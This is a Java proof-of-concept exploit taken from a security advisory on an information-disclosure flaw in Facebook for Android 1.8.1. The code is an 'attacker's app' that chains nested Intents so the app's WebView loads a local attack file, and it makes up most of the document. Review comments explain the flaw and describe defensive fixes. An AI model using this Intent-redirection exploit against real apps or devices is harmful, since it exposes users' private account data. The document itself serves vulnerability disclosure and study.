/*
 * source: https://www.securityfocus.com/bid/57173/info
 *
 * Facebook for Android is prone to an information-disclosure vulnerability.
 * Successful exploits allow an attacker to gain access to sensitive information.
 * Information obtained may aid in further attacks.
 *
 * Facebook for Android 1.8.1 is vulnerable; other versions may also be affected.
 */

// ++++++ Attacker's app (activity) ++++++

// notice: for a successful attack, the victim user must be logged-in
// to Facebook in advance.

/**
 * Proof-of-concept activity from the advisory above.
 *
 * <p>It sends an explicit Intent to the Facebook app's LoginActivity and nests a
 * second Intent (aimed at FacebookWebViewActivity, carrying a {@code url} extra)
 * inside the {@code continuation_intent} extra.
 *
 * <p>NOTE(review): the listing implies two weaknesses on the receiving side:
 * LoginActivity appears to relaunch a caller-supplied Intent without checking
 * its target, and FacebookWebViewActivity loads a caller-supplied URL, including
 * the {@code file:} scheme. The receiving code is not shown on this page, so
 * confirm both against the application itself. The defensive counterparts are to
 * treat any Intent read from extras as untrusted before handing it to
 * {@code startActivity}, and to restrict what a WebView will load to an
 * allow-list of schemes and hosts.
 */
public class AttackFacebook extends Activity {

    /** Package name of the Facebook app. */
    static final String FB_PKG = "com.facebook.katana";

    /** Fully qualified name of the Facebook app's LoginActivity. */
    static final String FB_LOGIN_ACTIVITY = FB_PKG + ".LoginActivity";

    /** Fully qualified name of the Facebook app's FacebookWebViewActivity. */
    static final String FB_WEBVIEW_ACTIVITY = FB_PKG + ".view.FacebookWebViewActivity";

    /** Runs the proof of concept as soon as the activity is created. */
    @Override
    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        attack();
    }

    /**
     * Builds the nested Intent pair and starts LoginActivity with it.
     *
     * <p>The inner Intent names FacebookWebViewActivity and carries the URL that,
     * per the advisory, that activity loads into its WebView. The outer Intent
     * names LoginActivity and carries the inner one as its continuation.
     */
    public void attack() {
        // Inner (continuation) Intent: targets the WebView activity; the "url"
        // extra is the local HTML file the advisory's second listing provides.
        final Intent webViewIntent = new Intent()
                .setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY)
                .putExtra("url", "file:///sdcard/attack.html");

        // Outer Intent: targets LoginActivity and wraps the inner Intent in the
        // continuation_intent extra.
        final Intent loginIntent = new Intent()
                .setClassName(FB_PKG, FB_LOGIN_ACTIVITY)
                .putExtra("login_redirect", false)
                .putExtra(FB_PKG + ".continuation_intent", webViewIntent);

        // Hand the outer Intent to LoginActivity.
        startActivity(loginIntent);
    }
}

// ++++++ Attacker's HTML/JavaScript file ++++++

attack.html